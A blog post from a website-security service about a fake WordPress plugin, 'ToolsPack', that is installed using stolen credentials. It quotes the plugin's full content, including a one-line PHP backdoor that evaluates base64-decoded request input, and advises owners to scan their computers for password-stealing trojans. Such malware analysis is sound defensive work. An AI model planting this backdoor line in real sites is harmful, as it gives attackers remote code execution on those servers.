Over the past 2 weeks we’ve seen many infected WordPress websites. A large portion of these infected WordPress websites had the ToolsPack plugin installed.
This plugin only has one file: /wp-content/plugins/ToolsPack/ToolsPack.php
Inside that file looks like this:
Plugin Name: ToolsPack
Description: Supercharge your WordPress site with powerful features previously only available to WordPress.com users. core release. Keep the plugin updated!
Author: Mark Stain
Author URI: http://checkWPTools.com/
$_REQUEST[e] ? eVAl( base64_decode( $_REQUEST[e] ) ) : exit;
Part of our process in the cleaning of an infected website is determining how the website was infected so we can create a security plan to prevent the website from being infected again.
Many of these infected WordPress websites were “hacked” by stolen login credentials – yes, the WordPress username and password.
How did we find this?
Our process includes log file analysis. We started seeing traffic to the ToolsPack.php file around the same time the files were infected. Closer examination of that file revealed the code listed above.
Some Google searches showed that while the plugin appeared to be marketed as legitimate, it was not.
Further analysis of the datetime stamp on ToolsPack folder and the log files did not show any correlation. In talking with the website owners we had them run virus scans on their computers and everyone of them with the ToolsPack plugin had a virus or trojan on them. This included Apple’s Mac.
Yes, the hackers are infected computers, both PCs and Macs with password stealing trojans. These password stealing trojans are stealing all passwords.
We have worked on many hosting accounts that had FTP accounts added to them. The hackers stole the hosting account username and password, logged in and created their own FTP accounts – with strong passwords of course.
Website security is a blended partnership between WeWatchYourWebsite and you. We can watch and update and protect your website, but if the hackers are logging in as you, we cannot prevent that.
Strong passwords, renaming the admin account and all the security related plugins would not prevent this type of attack. You may be alerted to the new plugin being installed, but by then, your account has already been compromised.
We suggest you run a full virus scan on your computer, yes even on your Mac, at least once a week. Be certain that the signatures are updated every day as well.
If you assistance in recovering from this infection, please contact me directly at: firstname.lastname@example.org or by phone at: (847)728-0214.